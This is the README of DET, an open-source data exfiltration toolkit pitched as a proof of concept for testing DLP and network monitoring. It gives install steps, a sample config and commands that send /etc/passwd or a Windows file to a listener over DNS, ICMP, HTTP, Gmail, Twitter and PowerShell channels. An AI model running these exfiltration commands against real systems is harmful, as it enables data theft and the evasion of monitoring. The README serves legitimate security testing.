DET (extensible) Data Exfiltration Toolkit
DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time.
This is a Proof of Concept aimed at identifying possible DLP failures. This should never be used to exfiltrate sensitive/live data (say on an assessment)
The idea was to create a generic toolkit to plug any kind of protocol/service to test implmented Network Monitoring and Data Leakage Prevention (DLP) solutions configuration, against different data exfiltration techniques.
The primary repository has now moved to here.
Slides
DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here.
Example usage (ICMP plugin)
Server-side:
Client-side:
Usage while combining two channels (Gmail/Twitter)
Server-side:
Client-side:
Installation
Clone the repo:
git clone https://github.com/sensepost/DET.git
Then:
pip install -r requirements.txt --user
Configuration
In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption
passphrase and so on). A configuration example file has been provided and is called: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.1.101",
"port": 8080
},
"google_docs": {
"target": "192.168.1.101",
"port": 8080,
},
"dns": {
"key": "google.com",
"target": "192.168.1.101",
"port": 53
},
"gmail": {
"username": "[email protected]",
"password": "ReallyStrongPassword",
"server": "smtp.gmail.com",
"port": 587
},
"tcp": {
"target": "192.168.1.101",
"port": 6969
},
"udp": {
"target": "192.168.1.101",
"port": 6969
},
"twitter": {
"username": "PaulWebSec",
"CONSUMER_TOKEN": "XXXXXXXXX",
"CONSUMER_SECRET": "XXXXXXXXX",
"ACCESS_TOKEN": "XXXXXXXXX",
"ACCESS_TOKEN_SECRET": "XXXXXXXXX"
},
"icmp": {
"target": "192.168.1.101"
}
},
"AES_KEY": "THISISACRAZYKEY",
"sleep_time": 10
}
Usage
Help usage
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L]
Data Exfiltration Toolkit (SensePost)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
Server-side:
To load every plugin:
python det.py -L -c ./config.json
To load only twitter and gmail modules:
python det.py -L -c ./config.json -p twitter,gmail
To load every plugin and exclude DNS:
python det.py -L -c ./config.json -e dns
Client-side:
To load every plugin:
python det.py -c ./config.json -f /etc/passwd
To load only twitter and gmail modules:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
To load every plugin and exclude DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
And in PowerShell (HTTP module):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
Modules
So far, DET supports multiple protocols, listed here:
- HTTP(S)
- ICMP
- DNS
- SMTP/IMAP (eg. Gmail)
- Raw TCP
- PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
And other "services":
- Google Docs (Unauthenticated)
- Twitter (Direct Messages)
Experimental modules
So far, I am busy implementing new modules which are almost ready to ship, including:
- Skype (95% done)
- Tor (80% done)
- Github (30/40% done)
Roadmap
- Add proper encryption (eg. AES-256) Thanks to ryanohoro
- Compression (extremely important!) Thanks to chokepoint
- Proper data obfuscation and integrating Cloakify Toolset Toolset
- FTP, FlickR LSB Steganography and Youtube modules
References
Some pretty cool references/credits to people I got inspired by with their project:
- https://github.com/nullbind/Powershellery/ from Nullbind.
- https://github.com/ytisf/PyExfil, truely awesome.
- https://github.com/m57/dnsteal from m57.
- https://github.com/3nc0d3r/NaishoDeNusumu from 3nc0d3r.
- https://github.com/glennzw/exphil from Glenn Wilkinson.
- WebExfile from Saif El-Sherei
Contact/Contributing
You can reach me on Twitter @PaulWebSec. Feel free if you want to contribute, clone, fork, submit your PR and so on.
License
DET is licensed under a MIT License. Permissions beyond the scope of this license may be available at [email protected]